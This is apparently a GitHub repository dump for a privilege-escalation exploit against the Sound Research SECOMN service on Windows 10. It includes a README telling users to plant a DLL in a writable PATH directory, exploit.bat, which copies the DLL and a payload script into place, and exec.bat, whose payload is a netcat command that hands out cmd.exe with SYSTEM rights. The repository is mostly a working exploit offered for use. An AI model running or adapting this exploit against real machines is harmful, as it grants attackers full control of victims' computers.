├── README.md ├── SoundEdge.Hydra.DSP.HiFi2.dll ├── exec.bat ├── exploit.bat └── secomn_eop.jpg /README.md: -------------------------------------------------------------------------------- 1 | # SECOMN_EoP 2 | Sound Research SECOMN service Privilege Escalation (windows 10) 3 | 4 | `It's not windows buildin service. Just one of windows sound driver service. But some of the pc have that service since driver installed. 5 | https://www.catalog.update.microsoft.com/Search.aspx?q=windows+10+sound+driver ` 6 | 7 | +++ 8 | `Not for all windows. Above Service need to be exist to exploit this bug` 9 | +++ 10 | 11 | 12 | ##### Modify command which included in exec.bat that as you want to run with High Privileged SYSTEM access. 13 | ##### Note: You need to change writeable path such as "C:\python27" which include in %path% environment variable in exploit.bat 14 | 15 |
16 | 17 | ![test1](https://github.com/sailay1996/SECOMN_EoP/blob/master/secomn_eop.jpg) 18 | 19 | [@404death](https://twitter.com/404death) 20 | -------------------------------------------------------------------------------- /SoundEdge.Hydra.DSP.HiFi2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/SECOMN_EoP/debffaff1d2d56d24198c1506d5ae6d3b0bddd01/SoundEdge.Hydra.DSP.HiFi2.dll -------------------------------------------------------------------------------- /exec.bat: -------------------------------------------------------------------------------- 1 | C:\temp\nc\nc.exe 127.0.0.1 1337 -e cmd.exe -------------------------------------------------------------------------------- /exploit.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo [+] Sound Research SECOMN service EoP (windows 10) by @404death... 3 | copy SoundEdge.Hydra.DSP.HiFi2.dll C:\python27 > NUL 4 | mkdir C:\temp 2>NUL 5 | copy exec.bat C:\temp > NUL 6 | echo [+] Restart the pc for exploting ! (restart the service for education purpose) 7 | echo [+] payload commands in exec.bat will execute after reboot or restart the service ! 8 | echo ..... 9 | -------------------------------------------------------------------------------- /secomn_eop.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/SECOMN_EoP/debffaff1d2d56d24198c1506d5ae6d3b0bddd01/secomn_eop.jpg --------------------------------------------------------------------------------